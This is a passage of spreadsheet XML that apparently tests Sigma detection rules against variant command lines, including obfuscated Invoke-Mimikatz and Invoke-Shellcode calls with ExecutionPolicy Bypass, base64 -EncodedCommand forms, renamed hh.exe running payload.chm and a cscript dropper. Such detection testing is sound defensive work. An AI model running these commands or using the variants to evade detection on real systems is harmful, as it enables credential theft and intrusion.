      <c r="K664" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="665" ht="15.75" customHeight="1" s="42">
      <c r="A665" s="43" t="n"/>
      <c r="B665" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C665" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D665" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E665" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I665" s="44" t="n"/>
      <c r="J665" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K665" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="666" ht="15.75" customHeight="1" s="42">
      <c r="A666" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B666" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C666" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D666" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E666" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I666" s="43" t="n"/>
      <c r="J666" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K666" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="667" ht="15.75" customHeight="1" s="42">
      <c r="A667" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B667" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C667" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D667" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E667" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I667" s="43" t="n"/>
      <c r="J667" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K667" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="668" ht="15.75" customHeight="1" s="42">
      <c r="A668" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B668" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C668" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D668" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E668" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I668" s="43" t="n"/>
      <c r="J668" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K668" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="669" ht="15.75" customHeight="1" s="42">
      <c r="A669" s="43" t="n"/>
      <c r="B669" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C669" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D669" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E669" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q /c "ch""cp" 1252</t>
        </is>
      </c>
      <c r="F669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I669" s="44" t="n"/>
      <c r="J669" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K669" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="670" ht="15.75" customHeight="1" s="42">
      <c r="A670" s="43" t="n"/>
      <c r="B670" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C670" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D670" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E670" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /node:localhost process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I670" s="44" t="n"/>
      <c r="J670" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K670" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="671" ht="15.75" customHeight="1" s="42">
      <c r="A671" s="43" t="n"/>
      <c r="B671" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C671" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D671" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E671" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe -"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I671" s="44" t="n"/>
      <c r="J671" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K671" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="672" ht="15.75" customHeight="1" s="42">
      <c r="A672" s="43" t="n"/>
      <c r="B672" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C672" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D672" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E672" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /noDe:LOCALhosT process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I672" s="43" t="n"/>
      <c r="J672" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K672" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="673" ht="15.75" customHeight="1" s="42">
      <c r="A673" s="43" t="n"/>
      <c r="B673" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C673" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D673" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E673" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I673" s="44" t="n"/>
      <c r="J673" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K673" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="674" ht="15.75" customHeight="1" s="42">
      <c r="A674" s="44" t="n"/>
      <c r="B674" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C674" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D674" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E674" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd /d C:\Users\Public\ &amp;&amp; cscript script.vbs"</t>
        </is>
      </c>
      <c r="F674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I674" s="43" t="n"/>
      <c r="J674" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K674" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="675" ht="15.75" customHeight="1" s="42">
      <c r="A675" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B675" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C675" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D675" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E675" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I675" s="43" t="n"/>
      <c r="J675" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K675" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="676" ht="15.75" customHeight="1" s="42">
      <c r="A676" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B676" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C676" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D676" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E676" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I676" s="44" t="n"/>
      <c r="J676" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K676" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="677" ht="15.75" customHeight="1" s="42">
      <c r="A677" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B677" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C677" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D677" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E677" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I677" s="44" t="n"/>
      <c r="J677" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K677" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="678" ht="15.75" customHeight="1" s="42">
      <c r="A678" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B678" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C678" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D678" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E678" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I678" s="44" t="n"/>
      <c r="J678" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K678" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="679" ht="15.75" customHeight="1" s="42">
      <c r="A679" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B679" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C679" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D679" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E679" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I679" s="44" t="n"/>
      <c r="J679" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K679" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="680" ht="15.75" customHeight="1" s="42">
      <c r="A680" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B680" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C680" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D680" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E680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680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I680" s="43" t="n"/>
      <c r="J680" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K680" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="681" ht="15.75" customHeight="1" s="42">
      <c r="A681" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B681" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C681" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D681" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E681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681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I681" s="44" t="n"/>
      <c r="J681" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K681" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="682" ht="15.75" customHeight="1" s="42">
      <c r="A682" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B682" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C682" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D682" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E682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682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I682" s="43" t="n"/>
      <c r="J682" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K682" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="683" ht="15.75" customHeight="1" s="42">
      <c r="A683" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B683" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C683" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D683" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E683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683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I683" s="43" t="n"/>
      <c r="J683" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K683" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="684" ht="15.75" customHeight="1" s="42">
      <c r="A684" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B684" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C684" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D684" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E684" s="4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684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I684" s="43" t="n"/>
      <c r="J684" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K684" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="685" ht="15.75" customHeight="1" s="42">
      <c r="A685" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B685" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C685" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D685" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E685" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I685" s="44" t="n"/>
      <c r="J685" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K685" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="686" ht="15.75" customHeight="1" s="42">
      <c r="A686" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B686" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C686" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D686" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E686" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I686" s="44" t="n"/>
      <c r="J686" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K686" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="687" ht="15.75" customHeight="1" s="42">
      <c r="A687" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B687" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C687" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D687" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E687" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I687" s="43" t="n"/>
      <c r="J687" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K687" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="688" ht="15.75" customHeight="1" s="42">
      <c r="A688" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B688" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C688" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D688" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E688" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I688" s="44" t="n"/>
      <c r="J688" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K688" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="689" ht="15.75" customHeight="1" s="42">
      <c r="A689" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B689" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C689" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D689" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E689" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I689" s="44" t="n"/>
      <c r="J689" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K689" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="690" ht="15.75" customHeight="1" s="42">
      <c r="A690" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B690" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C690" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D690" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E690" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I690" s="44" t="n"/>
      <c r="J690" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K690" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="691" ht="15.75" customHeight="1" s="42">
      <c r="A691" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B691" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C691" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D691" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E691" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I691" s="44" t="n"/>
      <c r="J691" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K691" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="692" ht="15.75" customHeight="1" s="42">
      <c r="A692" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B692" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C692" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D692" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E692" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I692" s="44" t="n"/>
      <c r="J692" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K692" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="693" ht="15.75" customHeight="1" s="42">
      <c r="A693" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B693" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C693" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D693" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E693" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I693" s="44" t="n"/>
      <c r="J693" s="44" t="n">
        <v>0</v>
      </c>
